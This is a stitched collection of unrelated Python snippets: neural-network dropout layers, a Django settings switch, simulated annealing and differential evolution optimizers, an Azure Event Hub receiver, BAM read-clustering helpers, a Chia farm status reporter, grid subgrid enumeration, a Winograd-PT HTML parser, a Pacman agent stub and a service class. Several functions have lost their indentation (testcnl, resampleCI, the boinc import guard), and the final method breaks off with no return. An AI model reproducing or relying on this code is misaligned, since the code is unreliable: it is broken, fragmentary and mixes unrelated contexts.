    # Output heads: predictive mean and log-variance.
    mean, reg = ConcreteDropout(Dense(n_outputs), weight_regularizer=wd, dropout_regularizer=dropout_reg)(x)
    regularizer_losses.append(reg)
    log_var, reg = ConcreteDropout(Dense(n_outputs), weight_regularizer=wd, dropout_regularizer=dropout_reg)(x)
    regularizer_losses.append(reg)
    out = concatenate([mean, log_var])
    model = Model(inp, out)
    for reg in regularizer_losses:
        model.add_loss(reg)
    model.compile(optimizer=optimizers.Adam(), loss=heteroscedastic_loss, metrics=[mse_loss])
    assert len(model.layers[1].trainable_weights) == 3 # kernel, bias, and dropout prob
    assert len(model.losses) == 5, f'{len(model.losses)} is not 5' # a loss for each Concrete Dropout layer
    return model
|
import socket

# My laptop's hostname is 'Guinsly-thinkpad-lenovo'.  Compare
# case-insensitively: gethostname() preserves the OS's casing, so the old
# lowercase substring test `'guinsly' in socket.gethostname()` would miss
# the capitalised hostname and silently fall through to production settings.
if 'guinsly' in socket.gethostname().lower():
    from .development import *
    # NOTE(review): django.core.urlresolvers was removed in Django 2.0;
    # on upgrade switch to `from django.urls import reverse_lazy`.
    from django.core.urlresolvers import reverse_lazy
    LOGIN_REDIRECT_URL = reverse_lazy('dashboard')
    LOGIN_URL = reverse_lazy('login')
    LOGOUT_URL = reverse_lazy('logout')
    print('--dev--settings--')
else:
    from .production import *
    #print('prod--settings')
# This environment-specific settings selector won't be loaded in git.
|
from __future__ import print_function, division
from lib import *
from run import *
def testcnl(x):
def f(x) : return x**2 + 3*x + 1
def g(x) : return 3*x + 3
return abs(f(x) - g(x))
print(testcnl(-1.39356))
class CurveAndLine(Function):
    """Toy single-objective model: minimise |f(x)-g(x)| (see testcnl) for
    one decision variable x in [-4, 4].

    NOTE(review): `i` is this codebase's convention for `self`; Have/Aux/Time
    come from the project DSL (`from lib import *`) — semantics assumed.
    """
    def cells(i):
        # One decision Aux 'x' and one objective Aux 'f' (goal=lt: minimise).
        return Have(#T = Time(),
                    x = Aux('x',lo=-4,hi=4,touch=True),
                    f = Aux("f",obj=lambda st: testcnl(st.x),
                            goal=lt,lo=-20,hi=20))
class ZDT1(Function):
    """ZDT1 bi-objective benchmark: 30 decision variables in [0,1],
    objectives f1 and f2 both minimised (goal=lt).

    NOTE(review): Python 2 era code (`xrange`).  The `round()` in f2 is not
    part of the canonical ZDT1 formulation g*(1 - sqrt(f1/g)) — confirm it
    is intentional before relying on the Pareto front shape.
    """
    def f1(i,it):
        # First objective is simply decision variable '0'.
        return it['0']
    def f2(i,it):
        # g aggregates all 30 decision variables.
        g = 1 + 9 * sum(it[str(x)] for x in range(30))/30
        return g * round(1- sqrt(it['0']/g))
    def cells(i):
        d =dict(T = Time(),
                f1 = Aux("f1",obj=i.f1,goal=lt,lo=0,hi=1),
                f2 = Aux("f2",obj=i.f2,goal=lt,lo=0,hi=10))
        # 30 decision Auxs named '0'..'29'.
        for x in xrange(30):
            d[str(x)] = Aux(str(x),lo=0,hi=1,touch=True)
        return Have(**d)
class DTLZ7(Function):
    "Has M-1 disconnected regions"
    def s(i,it,n):
        # Decision variable n, looked up by its string name.
        return it[str(n)]
    def __init__(i,m=20):
        i.m = m # which we will process as 0 ... i.m - 1
    def g(i,it):
        # Distance function over all m decision variables.
        return 1 + 9/i.m * sum(i.s(it,x) for x in xrange(0,i.m))
    def h(i,it,g):
        # Shape function producing the disconnected regions.
        return i.m - sum([i.s(it,x)/(1+g)*(1+sin(3*pi*i.s(it,x)))
                          for x in xrange(0,i.m - 1)])
    def fn(i,n):
        # Bind objective index n into a single-argument callable for Aux.
        return lambda it:i.f(n,it)
    def f(i,n,it):
        # Objectives 0..m-3 are the raw decisions; the last uses (1+g)*h.
        # NOTE(review): canonical DTLZ7 uses the first m-1 decisions directly;
        # the n < i.m - 2 cutoff here is assumed intentional.
        if n < (i.m - 2) :
            return i.s(it,n)
        else:
            g = i.g(it,)
            h = i.h(it,g)
            return (1 + g)*h
    def cells(i):
        d = dict(T=Time())
        # One decision Aux and one objective Aux per index 0..m-1.
        for x in xrange(i.m):
            d[ str(x)]= Aux(str(x),lo=0,hi=1, touch=True)
            d["f"+str(x)]= Aux(str(x),lo=0,hi=10, obj = i.fn(x))
        return Have(**d)
#tip: every new model is a big deal. new pony to ride. or, at least, to debug
def boolDom(_,fun,it1,e1,it2,e2):
    """Comparison policy: boolean domination between two candidates.

    Delegates to the model's own domination test; the aggregate energies
    e1/e2 (and the first argument) are ignored.
    """
    return fun.have.boolDom(it1, it2)
def lessEnergy(_,fun,it1,e1,it2,e2):
    """Comparison policy: prefer the candidate with strictly lower energy.

    Only the aggregate energies matter; the items and model are ignored.
    """
    return e2 > e1
def contDom(always,fun,it1,e1,it2,e2):
    """Comparison policy: continuous domination using the running numeric
    summaries kept in `always`; the aggregate energies are ignored."""
    return fun.have.contDom(always.nums, it1, it2)
# Default settings for simulated annealing (sa/sa1), registered with the
# project's @setting machinery (reachable as `the.SA`).
@setting
def SA(): return o(
    p=0.25,             # probability knob passed through to sa1
    cooling=1,          # cooling exponent for the temperature schedule
    kmax=1000,          # maximum number of evaluations
    epsilon=0.01,       # stop early once best energy drops below this
    cxt={},             # mutation context (shared dict)
    era=100,            # evaluations between progress checks/reports
    lives=5,            # eras without improvement before giving up
    better=lessEnergy,  # candidate comparison policy
    verbose=False)      # emit per-step progress characters
def sa(fun,**overrides):
    """Simulated-annealing entry point: merge keyword overrides into the SA
    defaults, then delegate to sa1.

    Fix: previously passed `**the.SA` to sa1, discarding the merged
    `options` — inconsistent with de(), which passes `**options`.  (If
    `o.__iadd__` mutates in place the old call happened to work; passing
    `options` makes the intent explicit either way.)
    """
    options = the.SA
    options += overrides
    return sa1(fun,**options)
def sa1(fun, p=None, cooling=None,
        kmax=None,epsilon=None, cxt=None, era=None, better=None,
        lives=None, verbose=None):
    """Simulated-annealing main loop over model `fun`.

    Returns the `now` log (a Haves) on termination.  Terminates when the
    best energy eb drops below epsilon ("E"), patience runs out ("L"), or
    kmax evaluations are exceeded ("K") — each checked only at era
    boundaries.

    NOTE(review): the `better` parameter is accepted but never used here.
    NOTE(review): the local `def p(...)` below shadows the `p` parameter,
    and its base `e` is the *current energy* captured by closure (rebound
    at `k,s,e = seen(...)`), not Euler's number — assumed intentional but
    worth confirming.
    """
    # Helper closures; k/now/always/last are read from this scope at call time.
    def decs() : return decisions(fun.have,cxt)
    def objs(it) : return fun.have.objectives(it)
    def log() : return Haves(fun.have)
    def goodbye(info) : fyi(info); return now
    def fyi(x) : verbose and say(x)
    def improving() : return last.above(now,epsilon)
    def baseline() :
        # Score an initial generation; its tuples are discarded (gen0 unused
        # by the caller), only the side effects on the logs matter.
        gen0= [seen(decs())for _ in xrange(era)]
        return era ,gen0
    def seen(it):
        # Evaluate a candidate, record it in both logs, return (next_k, it, energy).
        it = objs(it)
        now.add(it,k)
        always.add(it,k)
        e = always.aggregate(it)
        now.seen += [(e,it,k)]
        return k+1,it, e
    k, life, eb = 1, lives, 1e32
    now, always = log(), log()
    k,frontier = baseline()
    last, now = now, log()
    #=======================
    # Acceptance probability (Boltzmann-style) and mutation helpers.
    def p(old,new,t) : return e**((new-old)/(t+1))
    def mutant(it) : return mutate(fun.have,it,cxt,p)
    k,s,e = seen(decs())
    fyi("%4s [%2s] %3s "% (k,life,""))
    while True:
        info = "."
        k,sn,en = seen(mutant(s))
        if en < eb:
            # New global best (sb is recorded but not otherwise used).
            fyi("\033[7m!\033[m")
            sb,eb = sn,en
        if en < e:
            # Better than current: always accept.
            s,e = sn,en
            info = "+"
        elif p(e,en,(k/kmax)**(1/cooling)) < r():
            # Worse: accept probabilistically (classic SA escape move).
            s,e = sn, en
            info="?"
        if k % era:
            fyi(info)
        else:
            # Era boundary: update patience and test the three exits.
            life = lives if improving() else life - 1
            if eb < epsilon: return goodbye("E %.5f" %eb)
            if life < 1 : return goodbye("L")
            if k > kmax : return goodbye("K")
            fyi("\n%4s [%2s] %.3f %s" % (k,life,eb,info))
            last, now = now, log()
# acoid repeated calls to cells
def _sa0():
    """Experiment driver: run DE on ZDT1 under each `better` policy for ten
    seeds, printing every cached objective ('f*') value per configuration."""
    n = lambda z:z.__name__
    what = ZDT1
    last = results = None
    for opt in [de]:
        for better in [lessEnergy,boolDom,contDom]:
            print("\n %s : %s " % (opt.__name__,better.__name__))
            # Seed 6 is intentionally absent from the original list.
            for seed in [1,2,3,4,5,7,8,9,10]:
                fun = what()
                rseed(seed)
                last = opt(fun,era=50,epsilon=0.001,better=better,verbose=False)
                #print(last.scores.ntiles())
                # Dump raw cached values for objective columns only.
                for k,v in last.nums.items():
                    if k[0] == 'f':
                        print("%s-%s-%s-%s" % (n(what),k,n(opt),n(better)))
                        for x in v.cache.all: print(" %s" % x)
def _sa1():
    """Demo: simulated annealing on ZDT1 with tuned SA settings."""
    # if i added cxt, worse final scores
    with study('ZDT1',use(SA,lives=29,kmax=10000,era=100,
                          epsilon =0.01,p=0.33,cooling=0.1,
                          verbose=True)):
        rseed(1)
        # NOTE(review): sa() returns a single log; the 2-way unpack below is
        # kept as-is from the original — confirm it is exercised/intended.
        s,e=sa(ZDT1(),**the.SA)
    #f (0.1009110604332113, [0.101, 0.621, 1.407, 1.933, 2.904], 3.4072182909724873)
    #f (0.025561542674170656, [0.026, 0.515, 1.167, 1.881, 7.625], 7.624727551437976)
def _sa2():
    """Demo: simulated annealing on DTLZ7 with tuned SA settings."""
    # if i added cxt, worse final scores
    with study('DTZL',use(SA,lives=9,kmax=10000,era=200,
                          epsilon=0.01,p=0.33,cooling=0.10,
                          verbose=True)):
        rseed(1)
        s,e=sa(DTLZ7(),**the.SA)
        print(e)
# Default settings for differential evolution (de/de1), registered with the
# project's @setting machinery (reachable as `the.DE`).
@setting
def DE(): return o(
    f=0.5, cr=0.3, pop=10, kmax=10000,  # DE scale factor, crossover rate, pop size, eval budget
    better=lessEnergy,                  # candidate comparison policy
    epsilon=0.01, cxt={},               # early-stop threshold; mutation context
    lives=9, verbose=False)             # patience in eras; progress output
def de(fun,**overrides):
    """Differential-evolution entry point: merge keyword overrides into the
    DE defaults and delegate to de1."""
    merged = the.DE
    merged += overrides
    return de1(fun,**merged)
def de1(fun, f=None, cr=None, pop=None,
        better = None,
        kmax=None, epsilon=None, cxt=None, era=None,
        lives=None, verbose=None):
    """Differential-evolution main loop over model `fun`.

    Each sweep mutates every frontier slot with a three-parent crossover and
    replaces the parent when `better(...)` approves.  Returns the `now` log
    on termination: best energy below epsilon ("E"), patience exhausted
    ("L"), or kmax evaluations exceeded ("K") — checked at era boundaries.

    NOTE(review): `pop` is accepted but the frontier size is `era`, and
    `any(...)` inside any1() is assumed to be the project's random-choice
    helper (from `lib`), not the builtin — confirm.
    """
    # Helper closures; k/now/always/last are read from this scope at call time.
    def decs() : return decisions(fun.have,cxt)
    def objs(it) : return fun.have.objectives(it)
    def log() : return Haves(fun.have)
    def goodbye(info): fyi(info); return now
    def fyi(x) : verbose and say(x)
    def improving() : return last.above(now,epsilon)
    def baseline() :
        # Initial frontier of `era` scored candidates: list of (energy-ish tuple).
        gen0= [seen(decs())for k in xrange(era)]
        return era ,gen0
    def seen(it):
        # Evaluate a candidate, record it in both logs, return (next_k, it, energy).
        it = objs(it)
        now.add(it,k)
        always.add(it,k)
        e = always.aggregate(it)
        now.seen += [(e,it,k)]
        return k+1, it,e
    k, life, eb = 1, lives, 1e32
    now, always = log(),log()
    k,frontier = baseline()
    last,now= now,log()
    #=======================
    def any1(): _,it,_ = any(frontier); return it
    def mutant(a,b,c):
        return crossover(fun.have,a,b,c,f=f,cr=cr,cxt=cxt)
    fyi("%4s [%2s] %3s "% (k,life,""))
    while True:
        info = "."
        for pos in xrange(len(frontier)):
            info = "."
            _,parent,e = frontier[pos]
            # DE/rand/1-style child from three frontier picks.
            k,child,en = seen(mutant(any1(),any1(),any1()))
            if better(always,fun,child,en,parent,e):
                info = "+"
                frontier[pos] = k,child,en
            if en < eb:
                eb = en
                info = "\033[7m!\033[m"
            if k % era:
                fyi(info)
            else:
                # Era boundary: update patience and test the three exits.
                life = lives if improving() else life - 1
                if eb < epsilon : return goodbye("E %.5fs" % eb)
                if life < 1 : return goodbye("L")
                if k > kmax : return goodbye("K")
                fyi("\n%4s [%2s] %.3f %s" % (k,life,eb,info))
                last, now = now, log()
#smeagin
def _de1():
    """Demo: differential evolution on ZDT1 with default DE settings."""
    # if i added cxt, worse final scores
    with study('ZDT1',use(DE,verbose=True)):
        rseed(1)
        e=de(ZDT1(),**the.DE)
        print(e)
# Module entry point: runs the DE-vs-comparison-policy experiment on import;
# the alternative demos are left commented out.
_sa0()
#_sa1()
#_de1()
|
#!/usr/bin/env python
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
"""
An example to show running concurrent receivers.
"""
import os
import sys
import time
import logging
import asyncio
from azure.eventhub import Offset, EventHubClientAsync, AsyncReceiver
import examples
logger = examples.get_logger(logging.INFO)
# Address can be in either of these formats:
# "amqps://<URL-encoded-SAS-policy>:<URL-encoded-SAS-key>@<mynamespace>.servicebus.windows.net/myeventhub"
# "amqps://<mynamespace>.servicebus.windows.net/myeventhub"
ADDRESS = os.environ.get('EVENT_HUB_ADDRESS')
# SAS policy and key are not required if they are encoded in the URL
USER = os.environ.get('EVENT_HUB_SAS_POLICY')
KEY = os.environ.get('EVENT_HUB_SAS_KEY')
CONSUMER_GROUP = "$default"
OFFSET = Offset("-1")
async def pump(client, partition):
    """Attach a receiver to one partition, drain events (10s timeout per
    receive call), and report message count and elapsed time."""
    receiver = client.add_async_receiver(CONSUMER_GROUP, partition, OFFSET, prefetch=5)
    await client.run_async()
    message_count = 0
    started = time.time()
    batch = await receiver.receive(timeout=10)
    for event_data in batch:
        print("Received: {}, {}".format(event_data.offset.value, event_data.sequence_number))
        message_count += 1
    elapsed = time.time() - started
    print("Received {} messages in {} seconds".format(message_count, elapsed))
try:
    # Fail fast if the hub address env var was not supplied.
    if not ADDRESS:
        raise ValueError("No EventHubs URL supplied.")
    # Receive concurrently from partitions "0" and "1" of the event hub.
    loop = asyncio.get_event_loop()
    client = EventHubClientAsync(ADDRESS, debug=False, username=USER, password=KEY)
    tasks = [
        asyncio.ensure_future(pump(client, "0")),
        asyncio.ensure_future(pump(client, "1"))]
    loop.run_until_complete(asyncio.wait(tasks))
    # Shut the client down cleanly before closing the loop.
    loop.run_until_complete(client.stop_async())
    loop.close()
except KeyboardInterrupt:
    # Allow Ctrl-C to end the demo quietly.
    pass
|
import pysam,re
import numpy as np
import pandas as pd
from collections import Counter
from operator import itemgetter
NOCLUST = 999
DEFAULTCI= [0.025,0.975] #95%
def addHPtag(inBAM,outBAM,clusterMap,noCluster=NOCLUST,dropNoClust=False):
    """Copy inBAM to outBAM, setting an integer HP tag on every record.

    clusterMap is a map of {readname: cluster::int}.  Reads absent from the
    map get `noCluster` — or are skipped entirely when dropNoClust is True.
    The output BAM is indexed afterwards.
    """
    with pysam.AlignmentFile(inBAM) as inbam:
        with pysam.AlignmentFile(outBAM,'wb',template=inbam) as outbam:
            for rec in inbam:
                known = rec.query_name in clusterMap
                if dropNoClust and not known:
                    continue
                assigned = int(clusterMap.get(rec.query_name, noCluster))
                rec.set_tag('HP', assigned)
                outbam.write(rec)
    pysam.index(outBAM)
    return None
def clusterName(vals):
    """Format a cluster label from vals = (clusterInt, numreads),
    e.g. (3, 10) -> 'cluster3_numreads10'."""
    template = 'cluster{0[0]}_numreads{0[1]}'
    return template.format(vals)
def getCluster(name):
    """Extract the integer cluster id from a name like 'cluster12_numreads34'.

    Raises AttributeError if no 'cluster<digits>' substring is present
    (same as the original, which called .group on a None match).
    """
    match = re.search('cluster(\d+)', name)
    return int(match.group(1))
def readClusterFile(clustfile,nFields=3):
    '''
    Parse a FASTA-like cluster file into {readname: cluster::int}.

    Lines starting with '>' name the current cluster (parsed by getCluster);
    every following line is a read assigned to it.

    nFields: use n /-separated fields from input read names in result.
             nFields = 0 -> all fields (whole line, stripped)
    '''
    assignments = {}
    cluster = None
    with open(clustfile) as handle:
        for line in handle:
            if line.startswith('>'):
                cluster = getCluster(line[1:])
            elif nFields:
                read = '/'.join(line.split('/')[:nFields])
                assignments[read] = cluster
            else:
                assignments[line.strip()] = cluster
    return assignments
def getCounts(seqGen,kmerSize,motifCounter):
    """Build per-read kmer and motif count tables.

    seqGen yields (name, seq, qual) triples.  Returns (kmer, motif): two
    DataFrames indexed by read name with missing counts filled with 0.
    """
    names = []
    kmer_rows = []
    motif_rows = []
    for name, seq, qual in seqGen:
        names.append(name)
        kmer_rows.append(pd.Series(getKmerCounts(seq, k=kmerSize)))
        motif_rows.append(pd.Series(motifCounter(seq)))
    kmer = pd.DataFrame(kmer_rows, index=names).fillna(0)
    motif = pd.DataFrame(motif_rows, index=names).fillna(0)
    return kmer, motif
def getKmerCounts(seq,k=3):
    """Count every length-k substring of seq; sequences shorter than k
    yield an empty Counter."""
    windows = (seq[pos:pos + k] for pos in range(len(seq) - k + 1))
    return Counter(windows)
def resampleCI(data,nboot=10000,ci=DEFAULTCI):
n = max(nboot,len(data))
resamp = np.random.choice(data,size=n,replace=True)
return '({} - {})'.format(*list(map(int,np.quantile(resamp,ci))))
def clusterStats(motifCounts,clusterIdx,outColumns,
                 aggFuncs=[np.median,np.mean],
                 randomSeed=None,ci=DEFAULTCI):
    '''
    Summarise motif counts per cluster: aggregate outColumns with aggFuncs
    plus a bootstrap CI, attach cluster sizes, and relabel rows as
    'cluster<i>_numreads<n>'.

    motifCounts: df with cols = motif (+length), index = readnames
    clusterIdx: vector of cluster indices, same order as motifCounts.index
    outColumns: list of column names to describe in output
    aggFuncs: list of functions to apply to each column
    randomSeed: random seed for resampling ci

    Returns (names, results): the new row labels and the summary DataFrame.

    NOTE(review): assumes 'totalBp' is in outColumns (used as the sort key)
    and that aggFuncs includes a 'median' aggregation — otherwise the
    sort_values lookup fails.  The mutable default aggFuncs is shared
    across calls but never mutated here, so it is safe as written.
    '''
    clusters = motifCounts.groupby(clusterIdx)
    # Tuple name so the size column joins cleanly into the 2-level columns.
    clusterSize = clusters.size().rename(('Read','count'))
    #set random seed (so resampleCI's bootstrap is reproducible)
    np.random.seed(randomSeed)
    results = clusters[outColumns].agg(aggFuncs+[resampleCI])\
                                  .join(clusterSize)\
                                  .sort_values(('totalBp','median'))\
                                  .reset_index(drop=True)
    #rename clusters
    names = clusterSize.reset_index().apply(clusterName,axis=1)
    results.index = names.values
    #rename column: resampleCI -> e.g. 'ci95'
    name = 'ci%i' % int(100*(ci[1]-ci[0]))
    results.rename(columns={'resampleCI':name},level=1,inplace=True)
    return names,results
|
#
# Performs a REST call to controller (possibly localhost) of latest farm status.
#
import datetime
import http
import json
import os
import requests
import socket
import sqlite3
import traceback
from flask import g
from common.config import globals
from api.commands import chia_cli, chiadog_cli, plotman_cli
from api import app
from api import utils
def update():
    """Push this worker's current status (services, config, url) to the controller."""
    with app.app_context():
        try:
            hostname = utils.get_hostname()
            displayname = utils.get_displayname()
            config = globals.load()
            payload = {
                "hostname": hostname,
                "displayname": displayname,
                "mode": os.environ['mode'],
                "services": gather_services_status(),
                "url": utils.get_remote_url(),
                "config": json.dumps(config),
            }
            utils.send_post('/workers/', payload, debug=False)
        except Exception:
            # Best-effort heartbeat: log and continue, but no longer a bare
            # `except:` so SystemExit/KeyboardInterrupt still propagate.
            app.logger.info("Failed to load and send worker status.")
            app.logger.info(traceback.format_exc())
def gather_services_status():
    """Collect the run state of every managed service, returned as a JSON string."""
    gc = globals.load()

    def pid_status(pid):
        # A live pid means the service is up; otherwise it is enabled but stopped.
        return "running" if pid else "stopped"

    plotman_status = "disabled"
    if gc['plotting_enabled']:
        plotman_status = pid_status(plotman_cli.get_plotman_pid())
    archiver_status = "disabled"
    if gc['archiving_enabled']:
        archiver_status = pid_status(plotman_cli.get_archiver_pid())
    chia_farm_status = "disabled"
    chiadog_status = "disabled"
    if gc['farming_enabled']:
        chia_farm_status = chia_cli.load_farm_summary('chia').status
    if gc['farming_enabled'] or gc['harvesting_enabled']:
        chiadog_status = pid_status(chiadog_cli.get_chiadog_pid('chia'))
    flax_farm_status = "disabled"
    flaxdog_status = "disabled"
    if gc['farming_enabled'] and gc['flax_enabled']:
        flax_farm_status = chia_cli.load_farm_summary('flax').status
    if gc['flax_enabled'] and (gc['farming_enabled'] or gc['harvesting_enabled']):
        flaxdog_status = pid_status(chiadog_cli.get_chiadog_pid('flax'))
    return json.dumps({
        'plotman_status': plotman_status,
        'archiver_status': archiver_status,
        'chia_farm_status': chia_farm_status,
        'chiadog_status': chiadog_status,
        'flax_farm_status': flax_farm_status,
        'flaxdog_status': flaxdog_status,
    })
from django.urls import path
from rest_framework.urlpatterns import format_suffix_patterns
from customer.views import CustomersViewSet
# Bind HTTP verbs on the collection endpoint to viewset actions.
customer_list = CustomersViewSet.as_view({
    'get': 'list',
    'post': 'create'
})
# Bind HTTP verbs on the single-object endpoint to viewset actions.
customer_detail = CustomersViewSet.as_view({
    'get': 'retrieve',
    'put': 'update',
    'patch': 'partial_update',
    'delete': 'destroy'
})
# format_suffix_patterns adds optional format-suffix handling (e.g. .json).
urlpatterns = format_suffix_patterns([
    path('customers/', customer_list, name='customer-list'),
    path('customers/<int:pk>/', customer_detail, name='customer-detail'),
])
import random
import itertools
import iterators
import readPuzzle
def borderGen(coords):
    # Return (outside_neighbor, inside_cell) pairs along the border of the
    # region `coords` (a collection of (row, col) squares).
    # NOTE(review): grid bounds come from readPuzzle.rows / readPuzzle.cols,
    # assumed to be module-level attributes -- confirm against readPuzzle.
    borders = []
    for coord in coords:
        # Neighbors of this square that fall outside the region.
        neighbors = [neighbor for neighbor in gridNeighbors(coord, readPuzzle.rows, readPuzzle.cols)
                     if neighbor not in coords]
        borders += (((r, c), coord) for (r, c) in neighbors)
    return borders
# connectedSubgrids
# input: coords is a list of (row, col) co-ordinates defining the individual squares of a connected grid region.
# output: subgrids is a list of lists containing each connected subgrid of the original grid region.
# Note: This routine is not efficient. It runs in O(n 2^n)-time where n is the number of squares in the input.
def connectedSubgrids(coords, numSquares = None):
    """
    Enumerate every connected subgrid of `coords`.

    coords: list of (row, col) squares forming a connected region.
    numSquares: if given, only subgrids with exactly that many squares.
    Returns a list of subgrids (each a list of coords), or None on bad input.
    Runs in O(n * 2^n) time, n = len(coords).
    """
    # Handle bad inputs (idiomatic `is not None` / `not ...` comparisons).
    if numSquares is not None and len(coords) < numSquares:
        return None
    if not isConnected(coords):
        return None
    # Number of squares in the grid.
    n = len(coords)
    # Initialize the output.
    subgrids = []
    # An iterable for all binary strings of length n (with numSquares 1s).
    # Each binary string will be used as an incidence vector for the subgrids.
    # For example, (1,1,0,1) would represent the inclusion of squares 0,1,3.
    if numSquares is None:
        binaries = itertools.product([0,1], repeat=n)
    else:
        binaries = iterators.stcombos(n-numSquares, numSquares)
    # Check each binary string incidence vector.
    for binary in binaries:
        # Create the subgrid described by the incidence vector.
        subgrid = [coord for i, coord in enumerate(coords) if binary[i] == 1]
        # Skip over the empty subgrid case (ie all zeros case).
        if not subgrid: continue
        # If the subgrid is connected, then add it to the output list.
        if isConnected(subgrid):
            subgrids.append(subgrid)
    # Return the valid subgrids.
    return subgrids
# gridNeighbors
# input: coord = (row, col); optional grid bounds rows, cols (None = unbounded).
# output: list of orthogonally adjacent squares in up/down/left/right order,
#         clipped to the grid bounds when they are given.
def gridNeighbors(coord, rows = None, cols = None):
    r, c = coord
    neighbors = []
    if r > 0: neighbors.append((r-1, c))
    if rows is None or r < rows-1: neighbors.append((r+1, c))
    if c > 0: neighbors.append((r, c-1))
    if cols is None or c < cols-1: neighbors.append((r, c+1))
    return neighbors
# isConnected
# input: coords, a list of (row, col) squares.
# output: True when every square is reachable from the first square by
#         orthogonal steps; False for an empty list.
def isConnected(coords):
    found = gridBFS(coords)
    # gridBFS returns None for empty input; a full traversal visits every square.
    return found is not None and len(found) == len(coords)
# gridBFS
# input: coords, a list of hashable (row, col) squares.
# output: list of squares reachable from coords[0] in BFS visit order,
#         or None when coords is empty.
def gridBFS(coords):
    from collections import deque  # local import keeps module-level deps unchanged
    found = []
    if len(coords) == 0: return
    # set membership + deque.popleft() replace the original `in list` checks
    # and list.pop(0), which made the traversal quadratic.
    members = set(coords)
    todo = deque([coords[0]])
    queued = {coords[0]}  # everything ever enqueued (found + pending)
    while todo:
        current = todo.popleft()
        for neighbor in gridNeighbors(current):
            if neighbor in members and neighbor not in queued:
                queued.add(neighbor)
                todo.append(neighbor)
        found.append(current)
    return found
# randomCoords
# input: grid dimensions (rows, cols) and the number of squares wanted.
# output: list of `num` distinct random (row, col) squares, or None when
#         more squares are requested than the grid holds.
# For testing purposes.
def randomCoords(rows, cols, num):
    if num > rows*cols:
        return None
    picked = []
    while len(picked) < num:
        candidate = (random.randint(0, rows-1), random.randint(0, cols-1))
        if candidate not in picked:
            picked.append(candidate)
    return picked
if __name__ == "__main__":
    # Smoke-test driver: exercises border generation and subgrid
    # enumeration on a small 2x3 sample region.
    # Sample grid.
    grid = [(0,0), (0,1), (0,2), (1,0), (1,1), (1,2)]
    # Print the grid.
    print("Original grid squares")
    print(grid)
    # gen possible border cells/rooms
    borders = borderGen(grid)
    # Sample subgrids.
    subgrids = connectedSubgrids(grid)
    # Print each subgrid.
    print("\nConnected subgrids")
    for subgrid in subgrids:
        print(subgrid)
    # Sample subgrids with a specified number of squares.
    subgrids = connectedSubgrids(grid, 3)
    # Print each subgrid.
    print("\nConnected subgrids with a specified number of squares")
    for subgrid in subgrids:
        print(subgrid)
|
import pandas as pd
from bs4 import BeautifulSoup
from src.helpers.consts import WINOGRAD_PT_HTML_SCHEMAS_FILE, MISSING_TRANSLATION_INDEXES
def join_content(item):
    """
    Split a BeautifulSoup node's text into stripped, non-empty lines.

    NOTE(review): the first argument of replace() below appears to be a
    non-breaking space (U+00A0) normalised to a plain space -- confirm in
    the original source encoding.
    """
    content = [it.strip().replace(' ', ' ') for it in item.text.split('\n') if it.strip() != '']
    return content
def clean_tags_for_schema_and_snippet(item):
    """
    Remove <font>, <ol> and <p> descendants from a schema <li> node in place.

    Returns the mutated node so the call can be chained.
    NOTE(review): item.find('ol') is assumed to always match; a missing <ol>
    would raise AttributeError here.
    """
    # find_all() only ever yields Tag objects, so the original per-item
    # `is not None` check was dead code and has been dropped.
    for font in item.find_all('font'):
        font.extract()
    item.find('ol').extract()
    for p in item.find_all('p'):
        p.extract()
    return item
def get_schema_and_snippet_texts(item):
    """
    Extract (schema, snippet) texts from one <li> schema node.

    The node text is split on the 'Trecho:' (Portuguese "excerpt") marker;
    both halves are whitespace-normalised, the schema is forced to end in
    punctuation, and the snippet inherits that punctuation when it ends on
    the same word as the schema.
    NOTE(review): the replace() first arguments below appear to be
    non-breaking spaces (U+00A0) -- confirm in the original encoding.
    """
    item = clean_tags_for_schema_and_snippet(item)
    content = join_content(item)
    texts = (' ').join(content).split('Trecho:')
    schema = texts[0].replace(' ', ' ').strip()
    snippet = texts[1].replace(' ', ' ').strip()
    # Guarantee the schema ends with sentence punctuation.
    if not schema[-1] in ['.', '!', '?']:
        schema += '.'
    # Propagate the schema's final punctuation onto a matching snippet tail.
    if snippet[-1] != schema[-1] and schema[:-1].split()[-1] == snippet.split()[-1]:
        snippet += schema[-1]
    return schema, snippet
def generate_df_from_html():
    """
    Parse the Winograd-PT HTML schema file into a DataFrame.

    One row per <li> schema: columns are schema, snippet, pronoun,
    correct_answer, substitution_a, substitution_b, translated; rows listed
    in MISSING_TRANSLATION_INDEXES are flagged as untranslated.
    """
    with open(WINOGRAD_PT_HTML_SCHEMAS_FILE, 'r') as f:
        soup = BeautifulSoup(f, 'html5lib')
    rows = []
    for item in soup.find('ol').find_all('li', recursive=False):
        # The ambiguous pronoun is the bolded text inside the item.
        pronoun = item.find('b').text.strip()
        content = join_content(item)
        # Last lines hold the answer key and the two candidate substitutions.
        correct_answer = content[-1].replace('Resposta Correta:', '').strip()[0]
        substitution_a = content[-3]
        substitution_b = content[-2]
        schema, snippet = get_schema_and_snippet_texts(item)
        translated = True
        row = [schema, snippet, pronoun, correct_answer, substitution_a, substitution_b, translated]
        rows.append(row)
    df = pd.DataFrame(rows, columns=['schema', 'snippet', 'pronoun', 'correct_answer',
                                     'substitution_a', 'substitution_b', 'translated'])
    for index in MISSING_TRANSLATION_INDEXES:
        df.loc[index, 'translated'] = False
    return df
|
from util import *
from util import raiseNotDefined
import time, os
import traceback
try:
import boinc
_BOINC_ENABLED = True
except:
_BOINC_ENABLED = False
#######################
# Parts worth reading #
#######################
class Agent:
    """
    An agent must define a getAction method, but may also define the
    following methods which will be called if they exist:

    def registerInitialState(self, state): # inspects the starting state
    """

    def __init__(self, index=0):
        # Index of this agent in the game's agent list (0 = first agent).
        self.index = index

    def getAction(self, state):
        """
        The Agent will receive a GameState (from either {pacman, capture, sonar}.py) and
        must return an action from Directions.{North, South, East, West, Stop}

        Subclasses must override this; the base implementation aborts.
        """
        raiseNotDefined()
|
from typing import Any, List, Optional
from src.domain.userManagment.userSchema import UserCreateSchema, UserDBSchema, UserUpdateSchema
class UserService:
    """Application-service layer for user CRUD; persistence is delegated to `user_queries`."""

    def __init__(self, user_queries: Any):
        # Injected data-access object; only its async query methods are used.
        self.__user_queries = user_queries

    async def create_user(self, user: UserCreateSchema) -> UserDBSchema:
        """Persist a new user and return it as a DB schema."""
        new_user = await self.__user_queries.create_user(user)
        return UserDBSchema.from_orm(new_user)

    async def list_users(self) -> List[UserDBSchema]:
        """Return every stored user as a list of DB schemas."""
        users = await self.__user_queries.get_all_users()
        # Comprehension instead of list(map(lambda ...)): same result, idiomatic.
